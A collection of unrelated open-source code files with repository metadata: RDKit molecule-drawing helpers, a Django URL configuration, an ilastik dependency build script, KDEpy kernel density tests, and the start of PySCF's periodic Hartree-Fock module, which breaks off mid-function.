fig.savefig('coumlogps.colored.png',bbox_inches='tight')
"""
import numpy
from matplotlib import mlab
x = numpy.arange(0,1,step)
y = numpy.arange(0,1,step)
X,Y = numpy.meshgrid(x,y)
if weights is None:
weights=[1.]*mol.GetNumAtoms()
Z = mlab.bivariate_normal(X,Y,a,a,mol._atomPs[0][0], mol._atomPs[0][1])*weights[0]
for i in range(1,mol.GetNumAtoms()):
Zp = mlab.bivariate_normal(X,Y,a,a,mol._atomPs[i][0], mol._atomPs[i][1])
Z += Zp*weights[i]
return X,Y,Z
def MolsToImage(mols, subImgSize=(200,200),legends=None,**kwargs):
"""
"""
import Image
if legends is None: legends = [None]*len(mols)
res = Image.new("RGB",(subImgSize[0]*len(mols),subImgSize[1]))
for i,mol in enumerate(mols):
res.paste(MolToImage(mol,subImgSize,legend=legends[i],**kwargs),(i*subImgSize[0],0))
return res
def MolsToGridImage(mols,molsPerRow=3,subImgSize=(200,200),legends=None,**kwargs):
"""
"""
import Image
if legends is None: legends = [None]*len(mols)
nRows = len(mols)//molsPerRow
if len(mols)%molsPerRow : nRows+=1
res = Image.new("RGB",(molsPerRow*subImgSize[1],nRows*subImgSize[1]),(255,255,255))
for i,mol in enumerate(mols):
row = i//molsPerRow
col = i%molsPerRow
res.paste(MolToImage(mol,subImgSize,legend=legends[i],**kwargs),(col*subImgSize[0],row*subImgSize[1]))
return res
def ReactionToImage(rxn, subImgSize=(200,200),**kwargs):
"""
"""
import Image
mols = []
for i in range(rxn.GetNumReactantTemplates()):
tmpl=rxn.GetReactantTemplate(i)
tmpl.UpdatePropertyCache(False)
mols.append(tmpl)
mols.append(None)
for i in range(rxn.GetNumProductTemplates()):
tmpl = rxn.GetProductTemplate(i)
tmpl.UpdatePropertyCache(False)
mols.append(tmpl)
res = Image.new("RGB",(subImgSize[0]*len(mols),subImgSize[1]),(255,255,255))
for i,mol in enumerate(mols):
if mol is not None:
nimg = MolToImage(mol,subImgSize,kekulize=False,**kwargs)
else:
nimg,canvas = _createCanvas(subImgSize)
p0 = (10,subImgSize[1]//2)
p1 = (subImgSize[0]-10,subImgSize[1]//2)
p3 = (subImgSize[0]-20,subImgSize[1]//2-10)
p4 = (subImgSize[0]-20,subImgSize[1]//2+10)
canvas.addCanvasLine(p0,p1,lineWidth=2,color=(0,0,0))
canvas.addCanvasLine(p3,p1,lineWidth=2,color=(0,0,0))
canvas.addCanvasLine(p4,p1,lineWidth=2,color=(0,0,0))
if hasattr(canvas,'flush'):
canvas.flush()
else:
canvas.save()
res.paste(nimg,(i*subImgSize[0],0))
return res
| rdkit/rdkit-orig | rdkit/Chem/Draw/__init__.py | Python | bsd-3-clause | 8,895 | [
"RDKit"
] | fccc71065524c2b1993c36ab0cf92ec238116f464a045c4bec4c57b2f258732b |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.http import HttpResponse
from django.views.generic import TemplateView
from django.views import defaults as default_views
from django.contrib.sitemaps.views import sitemap
from views import HomeView, contact_us
from views import HomeView
from .sitemaps import StaticViewSitmap, NewsSiteMap
urlpatterns = [
url(r'^$', HomeView.as_view(), name='home'),
url(r'^contact_us$', contact_us, name='contact_us'),
url(r'^members/', include('members.urls', namespace='members')),
url(r'^flatpages/', include('flatpages.urls', namespace='flatpages')),
# robots.txt
url(r'^robots\.txt$',
lambda r: HttpResponse('User-agent: *\nDisallow: /members/*', content_type='text/plain')),
# sitemaps
url(r'^sitemap\.xml$', sitemap,
{'sitemaps': {'static': StaticViewSitmap}},
name='django.contrib.sitemaps.views.sitemap'),
# Django Admin, use {% url 'admin:index' %}
url(settings.ADMIN_URL, include(admin.site.urls)),
# User management
url(r'^users/', include('users.urls', namespace='users')),
url(r'^accounts/', include('allauth.urls')),
# Your stuff: custom urls includes go here
url(r'^summernote/', include('django_summernote.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
# This allows the error pages to be debugged during development, just visit
# these url in browser to see how these error pages look like.
urlpatterns += [
url(r'^400/$', default_views.bad_request, kwargs={'exception': Exception('Bad Request!')}),
url(r'^403/$', default_views.permission_denied, kwargs={'exception': Exception('Permission Denied')}),
url(r'^404/$', default_views.page_not_found, kwargs={'exception': Exception('Page not Found')}),
url(r'^500/$', default_views.server_error),
]
| mooja/ssip3 | app/config/urls.py | Python | mit | 2,068 | [
"VisIt"
] | b8003300f17bb24110ac849bf5d92bfbe7a11942ef5971e96fb670ead0926ea2 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2010 L Fiaschi, T Kroeger, M Nullmaier C Sommer, C Straehle, U Koethe, FA Hamprecht.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are
# permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of
# conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list
# of conditions and the following disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE ABOVE COPYRIGHT HOLDERS ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE ABOVE COPYRIGHT HOLDERS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those of the
# authors and should not be interpreted as representing official policies, either expressed
# or implied, of their employers.
import __builtin__
import platform
import urllib2, os, sys, tarfile, shutil
from hashlib import md5
####__builtin__.installDir="/ilastik"
__builtin__.installDir = os.environ["HOME"]
__builtin__.pythonVersion="2.7"
__builtin__.gcc="/usr/bin/gcc"
__builtin__.gpp="/usr/bin/g++"
__builtin__.ls="/bin/ls"
__builtin__.cd="cd"
__builtin__.make="/usr/bin/make"
__builtin__.pwd="/bin/pwd"
if platform.system() == "Darwin":
__builtin__.cmake="/usr/local/bin/cmake"
__builtin__.hg="/usr/local/bin/hg"
__builtin__.git="/usr/local/git/bin/git"
else:
__builtin__.cmake="/usr/bin/cmake"
__builtin__.hg="/usr/bin/hg"
__builtin__.git="/usr/bin/git"
if platform.system() == "Darwin":
__builtin__.pythonVersionPath = installDir+"/Frameworks/Python.framework/Versions/"+pythonVersion
else:
__builtin__.pythonVersionPath = installDir
__builtin__.pythonBinaryPath = pythonVersionPath+"/bin"
__builtin__.pythonSharePath = pythonVersionPath+"/share"
if platform.system() == "Darwin":
__builtin__.pythonLibrary = pythonVersionPath+"/lib/libpython"+pythonVersion+".dylib"
else:
__builtin__.pythonLibrary = pythonVersionPath+"/lib/libpython"+pythonVersion+".so"
__builtin__.pythonExecutable = pythonBinaryPath + "/python" + pythonVersion
__builtin__.pythonSitePackages = pythonVersionPath + "/lib/python" + pythonVersion + "/site-packages"
__builtin__.pythonIncludePath = pythonVersionPath + "/include/python" + pythonVersion
from PackagesItems import *
# Create the initial structure of the project ######################################################
def mkdir(dir):
if not os.path.exists(dir):
os.makedirs(dir)
mkdir('distfiles')
mkdir('work')
mkdir(installDir)
mkdir(installDir+'/lib')
mkdir(installDir+'/bin')
mkdir(installDir+'/include')
mkdir(installDir+'/Frameworks')
###################################################################################################
#IHOME=os.getcwd()
#print "Setting IHOME to" + IHOME
#os.environ["IHOME"]=IHOME
os.environ["CMAKE_PREFIX_PATH"] = installDir
os.environ["CMAKE_INSTALL_PREFIX"] = installDir
os.environ["CMAKE_INCLUDE_PATH"] = installDir+"/include"
os.environ["CMAKE_LIBRARY_PATH"] = installDir+"/lib"
os.environ["PATH"] = installDir+"bin:/usr/bin:/bin"
os.environ["LIBRARY_PATH"] = installDir+"/lib"
os.environ["C_INCLUDE_PATH"] = installDir+"/include"
os.environ["CPLUS_INCLUDE_PATH"] = installDir+"/include"
os.environ["PREFIX"] = installDir
os.environ['QTDIR'] = installDir
os.environ['PYTHONAPPSDIR'] = installDir + '/Applications/'
if platform.system() == "Darwin":
os.environ["CMAKE_FRAMEWORK_PATH"] = installDir+"/Frameworks"
#Packages that use setuptools have to know where Python is installed
#see: http://stackoverflow.com/questions/3390558/installing-setuptools-in-a-private-version-of-python
os.environ["FRAMEWORK_PATH"] = installDir+"/Frameworks"
os.environ["CC"] = gcc+" -arch x86_64"
os.environ["CXX"] = gpp+" -arch x86_64"
os.environ["LDFLAGS"] = "-arch x86_64"
os.environ["BASEFLAGS"] = "-arch x86_64"
os.environ["LDFLAGS"] = "-L"+installDir+"/lib" + " " + "-F"+installDir+"/Frameworks"
os.environ["CPPFLAGS"] = "-I"+installDir+"/include"
os.environ["MACOSX_DEPLOYMENT_TARGET"]="10.6"
else:
os.environ["LD_LIBRARY_PATH"] = "%s/lib" % (installDir,)
###################################################################################################
all = ['fftw3f', 'fftw3', 'jpeg', 'tiff', 'zlib','png', 'slib',
'python', 'nose', 'setuptools', 'py2app',
'hdf5',
'numpy', 'h5py', 'boost', 'sip',
'lis', 'vigra',
'qt', 'pyqt', 'qimage2ndarray',
'pyopenglaccellerate', 'pyopengl',
'enthoughtbase', 'traits', 'traitsgui', 'traitsbackendqt',
'vtk',
'greenlet',
'psutil',
'fixes']
#if platform.system() == "Darwin":
# all.append('py2app')
c = sys.argv[1:]
if 'all' in c:
c = all
#os.system("rm -rf " + installDir + "/*")
if 'from' in c:
startpackage=c[1]
try:
index=all.index(startpackage)
except:
raise RuntimeError('package ' + startpackage + 'not known')
for i in range(index,len(all)):
print all[i]
c.append(all[i])
if 'fftw3f' in c:
FFTW3F()
if 'fftw3' in c:
FFTW3()
if 'jpeg' in c:
JpegPackage()
if 'tiff' in c:
TiffPackage()
if 'zlib' in c:
ZlibPackage()
if 'png' in c:
PngPackage()
if 'slib' in c:
SlibPackage()
# # # # # # # # # # # # #
os.environ["PYTHONPATH"] = pythonSitePackages #installDir+"/bin:" + pythonSitePackages
os.environ["PATH"] = os.environ["PATH"] + ':' + pythonBinaryPath
if 'python' in c:
PythonPackage()
if 'nose' in c:
NosePackage()
if 'setuptools' in c:
SetuptoolsPackage()
if platform.system() == "Darwin":
if 'py2app' in c:
Py2appPackage()
# # # # # # # # # # # # #
if 'hdf5' in c:
Hdf5Package()
# # # # # # # # # # # # #
if 'numpy' in c:
NumpyPackage()
if 'h5py' in c:
H5pyPackage()
if 'boost' in c:
BoostPackage()
if 'sip' in c:
SipPackage()
# # # # # # # # # # # # #
if 'lis' in c:
LISPackage()
if 'vigra' in c:
##############################################CStraehlePackage()
VigraPackage()
# # # # # # # # # # # # #
if 'qt' in c:
QtPackage()
if 'pyqt' in c:
PyQtPackage()
if 'qimage2ndarray' in c:
Qimage2ndarrayPackage()
# # # # # # # # # # # # #
if 'pyopenglaccellerate' in c:
PyOpenGLAccelleratePackage()#
if 'pyopengl' in c:
PyOpenGLPackage()
# # # # # # # # # # # # #
if 'enthoughtbase' in c:
EnthoughtBasePackage()
if 'traits' in c:
TraitsPackage()
if 'traitsgui' in c:
TraitsGUIPackage()
if 'traitsbackendqt' in c:
TraitsBackendQtPackage()
# # # # # # # # # # # # #
if 'vtk' in c:
VTKGitPackage()
# # # # # # # # # # # # #
#New Stuff for the Graph
if "greenlet" in c:
GreenletPackage()
if "psutil" in c:
PsutilPackage()
#########################
if ('fixes' in c) and ('download' not in sys.argv[0]):
if platform.system() == "Darwin":
cmd = "cp -rv work/" + QtPackage.workdir + "/src/gui/mac/qt_menu.nib "+installDir+"/lib"
print "Workaround #1: ", cmd
os.system(cmd)
cmd = "mv %s/PyQt4/uic/port_v3 %s/PyQt4/uic/_port_v3" % (pythonSitePackages, pythonSitePackages)
print "Workaround #2: ", cmd
os.system(cmd)
cmd = "cp -rv work/vigra/vigranumpy/src/core/vigranumpycore.so "+installDir+"/lib"
print "Workaround #3: ", cmd
os.system(cmd)
| ilastik/ilastik-0.5 | scripts/install-ilastik-deps.py | Python | bsd-2-clause | 8,354 | [
"VTK"
] | 3073048f733e6c36f5302ce5564912cfb4249c26e70fcfe0b1d43e066f663c70 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Tests for the NaiveKDE. The NaiveKDE is tested against various properties, and
in turn more advanced implementations are tested against the NaiveKDE.
"""
import numpy as np
from KDEpy.NaiveKDE import NaiveKDE
import itertools
import pytest
args = list(itertools.product([[-1, 0, 1, 10], [1, 2, 3, 4], [1, 1, 1, 2]], [1, 2, 3]))
@pytest.mark.parametrize("data, split_index", args)
def test_additivity(data, split_index):
"""
Test the additive propery of the KDE.
"""
x = np.linspace(-10, 10)
# Fit to add data
y = NaiveKDE().fit(data).evaluate(x)
# Fit to splits, and compensate for smaller data using weights
weight_1 = split_index / len(data)
y_1 = NaiveKDE().fit(data[:split_index]).evaluate(x) * weight_1
weight_2 = (len(data) - split_index) / len(data)
y_2 = NaiveKDE().fit(data[split_index:]).evaluate(x) * weight_2
# Additive property of the functions
assert np.allclose(y, y_1 + y_2)
@pytest.mark.parametrize("data, split_index", args)
def test_additivity_with_weights(data, split_index):
"""
Test the additive propery of the KDE, with weights.
"""
x = np.linspace(-10, 15)
weights = np.arange(len(data)) + 1
weights = weights / np.sum(weights)
# Fit to add data
y = NaiveKDE().fit(data, weights).evaluate(x)
# Split up the data and the weights
data = list(data)
weights = list(weights)
data_first_split = data[:split_index]
data_second_split = data[split_index:]
weights_first_split = weights[:split_index]
weights_second_split = weights[split_index:]
# Fit to splits, and compensate for smaller data using weights
y_1 = NaiveKDE().fit(data_first_split, weights_first_split).evaluate(x) * sum(weights_first_split)
y_2 = NaiveKDE().fit(data_second_split, weights_second_split).evaluate(x) * sum(weights_second_split)
# Additive property of the functions
assert np.allclose(y, y_1 + y_2)
@pytest.mark.parametrize(
"kernel, bw, n, expected_result",
[
(
"box",
0.1,
5,
np.array([2.101278e-19, 3.469447e-18, 1.924501e00, 0.000000e00, 9.622504e-01]),
),
(
"box",
0.2,
5,
np.array([3.854941e-18, 2.929755e-17, 9.622504e-01, 0.000000e00, 4.811252e-01]),
),
("box", 0.6, 3, np.array([0.1603751, 0.4811252, 0.4811252])),
("tri", 0.6, 3, np.array([0.1298519, 0.5098009, 0.3865535])),
(
"epa",
0.1,
6,
np.array(
[
0.000000e00,
7.285839e-17,
2.251871e-01,
1.119926e00,
0.000000e00,
1.118034e00,
]
),
),
(
"biweight",
2,
5,
np.array([0.1524078, 0.1655184, 0.1729870, 0.1743973, 0.1696706]),
),
],
)
def test_against_R_density(kernel, bw, n, expected_result):
"""
Test against the following function call in R:
d <- density(c(0, 0.1, 1), kernel="{kernel}", bw={bw},
n={n}, from=-1, to=1);
d$y
I believe R uses FFT, so the results are approximate.
"""
data = np.array([0, 0.1, 1])
x = np.linspace(-1, 1, num=n)
y = NaiveKDE(kernel, bw=bw).fit(data).evaluate(x)
assert np.allclose(y, expected_result, atol=10 ** (-2.7))
@pytest.mark.parametrize(
"bw, n, expected_result",
[
(1, 3, np.array([0.17127129, 0.34595518, 0.30233275])),
(
0.1,
5,
np.array(
[
2.56493684e-22,
4.97598466e-06,
2.13637668e00,
4.56012216e-04,
1.32980760e00,
]
),
),
(0.01, 3, np.array([0.0, 13.29807601, 13.29807601])),
],
)
def test_against_scipy_density(bw, n, expected_result):
"""
Test against the following function call in SciPy:
data = np.array([0, 0.1, 1])
x = np.linspace(-1, 1, {n})
bw = {bw}/np.asarray(data).std(ddof=1)
density_estimate = gaussian_kde(dataset = data, bw_method = bw)
y = density_estimate.evaluate(x)
# Note that scipy weights its bandwidth by the covariance of the
# input data. To make the results comparable to the other methods,
# we divide the bandwidth by the sample standard deviation here.
"""
data = np.array([0, 0.1, 1])
x = np.linspace(-1, 1, num=n)
y = NaiveKDE(kernel="gaussian", bw=bw).fit(data).evaluate(x)
assert np.allclose(y, expected_result)
def test_constant_values_silverman():
"""
Test that a data set with constant values does not fail when using silverman's rule.
Tests with "almost" constant values should also get a bw assigned automatically,
although silverman's rule technically does not do this.
https://github.com/tommyod/KDEpy/issues/9
"""
data = np.ones(100, dtype=float)
kde = NaiveKDE(bw="silverman")
with pytest.warns(UserWarning):
kde.fit(data)
assert np.isclose(kde.bw, 1.0)
data = np.ones(1000, dtype=float)
data[0] = 0.0
data[999] = 2.0
kde = NaiveKDE(bw="silverman")
with pytest.warns(UserWarning):
kde.fit(data)
if __name__ == "__main__":
# --durations=10 <- May be used to show potentially slow tests
pytest.main(args=[".", "--doctest-modules", "-v", "-k constant"])
| tommyod/KDEpy | KDEpy/tests/test_NaiveKDE.py | Python | gpl-3.0 | 5,608 | [
"Gaussian"
] | 40e07fba04724104285a51302864a6a0cca066480356bf79d91bbdfa85ca5255 |
#!/usr/bin/env python
# Copyright 2014-2019 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: Garnet Chan <gkc1000@gmail.com>
# Timothy Berkelbach <tim.berkelbach@gmail.com>
# Qiming Sun <osirpt.sun@gmail.com>
#
'''
Hartree-Fock for periodic systems at a single k-point
See Also:
pyscf.pbc.scf.khf.py : Hartree-Fock for periodic systems with k-point sampling
'''
import sys
import numpy as np
import h5py
from pyscf.scf import hf as mol_hf
from pyscf import lib
from pyscf.lib import logger
from pyscf.data import nist
from pyscf.pbc import gto
from pyscf.pbc import tools
from pyscf.pbc.gto import ecp
from pyscf.pbc.gto.pseudo import get_pp
from pyscf.pbc.scf import chkfile # noqa
from pyscf.pbc.scf import addons
from pyscf.pbc import df
from pyscf.pbc.scf.rsjk import RangeSeparationJKBuilder
from pyscf.pbc.lib.kpts_helper import gamma_point
from pyscf import __config__
def get_ovlp(cell, kpt=np.zeros(3)):
'''Get the overlap AO matrix.
'''
# Avoid pbcopt's prescreening in the lattice sum, for better accuracy
s = cell.pbc_intor('int1e_ovlp', hermi=0, kpts=kpt,
pbcopt=lib.c_null_ptr())
s = lib.asarray(s)
hermi_error = abs(s - np.rollaxis(s.conj(), -1, -2)).max()
if hermi_error > cell.precision and hermi_error > 1e-12:
logger.warn(cell, '%.4g error found in overlap integrals. '
'cell.precision or cell.rcut can be adjusted to '
'improve accuracy.')
cond = np.max(lib.cond(s))
if cond * cell.precision > 1e2:
prec = 1e2 / cond
rmin = max([cell.bas_rcut(ib, prec) for ib in range(cell.nbas)])
if cell.rcut < rmin:
logger.warn(cell, 'Singularity detected in overlap matrix. '
'Integral accuracy may be not enough.\n '
'You can adjust cell.precision or cell.rcut to '
'improve accuracy. Recommended values are\n '
'cell.precision = %.2g or smaller.\n '
'cell.rcut = %.4g or larger.', prec, rmin)
return s
def get_hcore(cell, kpt=np.zeros(3)):
'''Get the core Hamiltonian AO matrix.
'''
hcore = get_t(cell, kpt)
if cell.pseudo:
hcore += get_pp(cell, kpt)
else:
hcore += get_nuc(cell, kpt)
if len(cell._ecpbas) > 0:
hcore += ecp.ecp_int(cell, kpt)
return hcore
def get_t(cell, kpt=np.zeros(3)):
'''Get the kinetic energy AO matrix.
'''
return cell.pbc_intor('int1e_kin', hermi=1, kpts=kpt)
def get_nuc(cell, kpt=np.zeros(3)):
'''Get the bare periodic nuc-el AO matrix, with G=0 removed.
See Martin (12.16)-(12.21).
'''
return df.FFTDF(cell).get_nuc(kpt)
def get_j(cell, dm, hermi=1, vhfopt=None, kpt=np.zeros(3), kpts_band=None):
'''Get the Coulomb (J) AO matrix for the given density matrix.
Args:
dm : ndarray or list of ndarrays
A density matrix or a list of density matrices
Kwargs:
hermi : int
Whether J, K matrix is hermitian
| 0 : no hermitian or symmetric
| 1 : hermitian
| 2 : anti-hermitian
vhfopt :
A class which holds precomputed quantities to optimize the
computation of J, K matrices
kpt : (3,) ndarray
The "inner" dummy k-point at which the DM was evaluated (or
sampled).
kpts_band : (3,) ndarray or (*,3) ndarray
An arbitrary "band" k-point at which J is evaluated.
Returns:
The function returns one J matrix, corresponding to the input
density matrix (both order and shape).
'''
return df.FFTDF(cell).get_jk(dm, hermi, kpt, kpts_band, with_k=False)[0]
def get_jk(mf, cell, dm, hermi=1, vhfopt=None, kpt=np.zeros(3),
kpts_band=None, with_j=True, with_k=True, omega=None, **kwargs):
'''Get the Coulomb (J) and exchange (K) AO matrices for the given density matrix.
Args:
dm : ndarray or list of ndarrays
A density matrix or a list of density matrices
Kwargs:
hermi : int
Whether J, K matrix is hermitian
| 0 : no hermitian or symmetric
| 1 : hermitian
| 2 : anti-hermitian
vhfopt :
A class which holds precomputed quantities to optimize the
computation of J, K matrices
kpt : (3,) ndarray
The "inner" dummy k-point at which the DM was evaluated (or
sampled).
kpts_band : (3,) ndarray or (*,3) ndarray
An arbitrary "band" k-point at which J and K are evaluated.
Returns:
The function returns one J and one K matrix, corresponding to the input
density matrix (both order and shape).
'''
return df.FFTDF(cell).get_jk(dm, hermi, kpt, kpts_band, with_j, with_k,
omega, exxdiv=mf.exxdiv)
def get_bands(mf, kpts_band, cell=None, dm=None, kpt=None):
'''Get energy bands at the given (arbitrary) 'band' k-points.
Returns:
mo_energy : (nmo,) ndarray or a list of (nmo,) ndarray
Bands energies E_n(k)
mo_coeff : (nao, nmo) ndarray or a list of (nao,nmo) ndarray
Band orbitals psi_n(k)
'''
if cell is None: cell = mf.cell
if dm is None: dm = mf.make_rdm1()
if kpt is None: kpt = mf.kpt
kpts_band = np.asarray(kpts_band)
single_kpt_band = (getattr(kpts_band, 'ndim', None) == 1)
kpts_band = kpts_band.reshape(-1,3)
fock = mf.get_hcore(cell, kpts_band)
fock = fock + mf.get_veff(cell, dm, kpt=kpt, kpts_band=kpts_band)
s1e = mf.get_ovlp(cell, kpts_band)
nkpts = len(kpts_band)
mo_energy = []
mo_coeff = []
for k in range(nkpts):
e, c = mf.eig(fock[k], s1e[k])
mo_energy.append(e)
mo_coeff.append(c)
if single_kpt_band:
mo_energy = mo_energy[0]
mo_coeff = mo_coeff[0]
return mo_energy, mo_coeff
def init_guess_by_chkfile(cell, chkfile_name, project=None, kpt=None):
'''Read the HF results from checkpoint file, then project it to the
basis defined by ``cell``
Returns:
Density matrix, (nao,nao) ndarray
'''
from pyscf.pbc.scf import uhf
dm = uhf.init_guess_by_chkfile(cell, chkfile_name, project, kpt)
return dm[0] + dm[1]
get_fock = mol_hf.get_fock
get_occ = mol_hf.get_occ
get_grad = mol_hf.get_grad
make_rdm1 = mol_hf.make_rdm1
energy_elec = mol_hf.energy_elec
def dip_moment(cell, dm, unit='Debye', verbose=logger.NOTE,
grids=None, rho=None, kpt=np.zeros(3), origin=None):
''' Dipole moment in the unit cell (is it well defined)?
Args:
cell : an instance of :class:`Cell`
dm (ndarray) : density matrix
Return:
A list: the dipole moment on x, y and z components
'''
from pyscf.pbc import tools
from pyscf.pbc.dft import gen_grid
from pyscf.pbc.dft import numint
if cell.dimension != 3:
# raise NotImplementedError
logger.warn(cell, 'Dipole moment for low-dimension system is not supported.')
return np.zeros(3)
log = logger.new_logger(cell, verbose)
a = cell.lattice_vectors()
b = np.linalg.inv(a).T
if grids is None:
grids = gen_grid.UniformGrids(cell)
#? FIXME: Less requirements on the density accuracy.
#ke_cutoff = gto.estimate_ke_cutoff(cell, 1e-5)
#grids.mesh = tools.cutoff_to_mesh(a, ke_cutoff)
if rho is None:
rho = numint.NumInt().get_rho(cell, dm, grids, kpt, cell.max_memory)
if origin is None:
origin = _search_dipole_gauge_origin(cell, grids, rho, log)
# Move the unit cell to the position around the origin.
def shift_grids(r):
r_frac = lib.dot(r - origin, b.T)
# Grids on the boundary (r_frac == +/-0.5) of the new cell may lead to
# unbalanced contributions to the dipole moment. Exclude them from the
# dipole and quadrupole
r_frac[r_frac== 0.5] = 0
r_frac[r_frac==-0.5] = 0
r_frac[r_frac > 0.5] -= 1
r_frac[r_frac <-0.5] += 1
r = lib.dot(r_frac, a)
return r
r = shift_grids(grids.coords)
e_dip = np.einsum('g,g,gx->x', rho, grids.weights, r)
charges = cell.atom_charges()
r = shift_grids(cell.atom_coords())
nuc_dip = np.einsum('g,gx->x', charges, r)
dip = nuc_dip - e_dip
if unit.upper() == 'DEBYE':
dip *= nist.AU2DEBYE
log.note('Dipole moment(X, Y, Z, Debye): %8.5f, %8.5f, %8.5f', *dip)
else:
log.note('Dipole moment(X, Y, Z, A.U.): %8.5f, %8.5f, %8.5f', *dip)
return dip
def _search_dipole_gauge_origin(cell, grids, rho, log):
'''Optimize the position of the unit cell in crystal. With a proper unit
cell, the nuclear charge center and the electron density center are at the
same point. This function returns the origin of such unit cell.
'''
from pyscf.pbc.dft import gen_grid
a = cell.lattice_vectors()
b = np.linalg.inv(a).T
charges = cell.atom_charges()
coords = cell.atom_coords()
origin = np.einsum('i,ix->x', charges, coords) / charges.sum()
log.debug1('Initial guess of origin center %s', origin)
nelec = np.dot(rho, grids.weights)
# The dipole moment in the crystal is not uniquely defined. Depending on
# the position and the shape of the unit cell, the value of dipole moment
# can be very different. The optimization below searches the boundary of
# cell inside which the nuclear charge center and electron density charge
# center locate at the same point. The gauge origin will be chosen at the
# center of unit cell.
if (cell.dimension == 3 and
# For orthogonal lattice only
abs(np.diag(a.diagonal())).max() and
isinstance(grids, gen_grid.UniformGrids)):
gridxyz = grids.coords.T.reshape(3, *grids.mesh)
gridbase = (gridxyz[0,:,0,0], gridxyz[1,0,:,0], gridxyz[2,0,0,:])
wxyz = grids.weights.reshape(grids.mesh)
rhoxyz = rho.reshape(grids.mesh)
def search_orig(ix, origin):
nx = grids.mesh[ix]
Lx = a[ix,ix]
g = gridbase[ix] - origin
g_frac = (g * b[ix,ix]).round(6)
g[g_frac == .5] = 0
g[g_frac ==-.5] = 0
g[g_frac > .5] -= Lx
g[g_frac < -.5] += Lx
meanx = np.einsum('xyz,xyz->'+('xyz'[ix]), rhoxyz, wxyz) / nelec
ex = meanx * g
r_nuc = coords[:,ix] - origin
r_frac = (r_nuc * b[ix,ix]).round(6)
r_nuc[r_frac == .5] = 0
r_nuc[r_frac ==-.5] = 0
r_nuc[r_frac > .5] -= Lx
r_nuc[r_frac < -.5] += Lx
nuc_dip = np.dot(charges, r_nuc) / charges.sum()
# ex.sum() ~ electron dipole wrt the given origin
dipx = nuc_dip - ex.sum()
g = gridbase[ix] - origin
sorted_meanx = np.hstack((meanx[g >= Lx/2],
meanx[(g < Lx/2) & (g >= -Lx/2)],
meanx[g < -Lx/2]))
if abs(dipx) < 1e-3:
offx = 0
elif dipx > 0:
# To cancel the positive dipole, move electrons to the right side
rcum_dip = np.append(0, np.cumsum(sorted_meanx * Lx))
idx = np.where(rcum_dip > dipx)[0][0]
dx = (rcum_dip[idx] - dipx) / (rcum_dip[idx] - rcum_dip[idx-1])
offx = (idx - dx) * Lx/nx
else:
# To cancel the negative dipole, move electrons to the left side
lcum_dip = np.append(0, np.cumsum(sorted_meanx[::-1] * Lx))
idx = np.where(lcum_dip > -dipx)[0][0]
dx = (lcum_dip[idx] - -dipx) / (lcum_dip[idx] - lcum_dip[idx-1])
offx = -(idx - dx) * Lx/nx
return origin + offx
wbar = grids.weights[0]**(1./3)
for i in range(4):
orig_last = origin
origin[0] = search_orig(0, origin[0])
origin[1] = search_orig(1, origin[1])
origin[2] = search_orig(2, origin[2])
if abs(origin - orig_last).max() < wbar:
break
log.debug1('iter %d: origin %s', i, origin)
else:
# If the grids are non-cubic grids, regenerating the grids is expensive if
# the position or the shape of the unit cell is changed. The position of
# the unit cell is not optimized. The gauge origin is set to the nuclear
# charge center of the original unit cell.
pass
return origin
def get_rho(mf, dm=None, grids=None, kpt=None):
'''Compute density in real space
'''
from pyscf.pbc.dft import gen_grid
from pyscf.pbc.dft import numint
if dm is None:
dm = mf.make_rdm1()
if getattr(dm, 'ndim', None) != 2: # UHF
dm = dm[0] + dm[1]
if grids is None:
grids = gen_grid.UniformGrids(mf.cell)
if kpt is None:
kpt = mf.kpt
ni = numint.NumInt()
return ni.get_rho(mf.cell, dm, grids, kpt, mf.max_memory)
def _dip_correction(mf):
'''Makov-Payne corrections for charged systems.'''
from pyscf.pbc import tools
from pyscf.pbc.dft import gen_grid
log = logger.new_logger(mf)
cell = mf.cell
a = cell.lattice_vectors()
b = np.linalg.inv(a).T
grids = gen_grid.UniformGrids(cell)
ke_cutoff = gto.estimate_ke_cutoff(cell, 1e-5)
grids.mesh = tools.cutoff_to_mesh(a, ke_cutoff)
dm = mf.make_rdm1()
rho = mf.get_rho(dm, grids, mf.kpt)
origin = _search_dipole_gauge_origin(cell, grids, rho, log)
def shift_grids(r):
r_frac = lib.dot(r - origin, b.T)
# Grids on the boundary (r_frac == +/-0.5) of the new cell may lead to
# unbalanced contributions to the dipole moment. Exclude them from the
# dipole and quadrupole
r_frac[r_frac== 0.5] = 0
r_frac[r_frac==-0.5] = 0
r_frac[r_frac > 0.5] -= 1
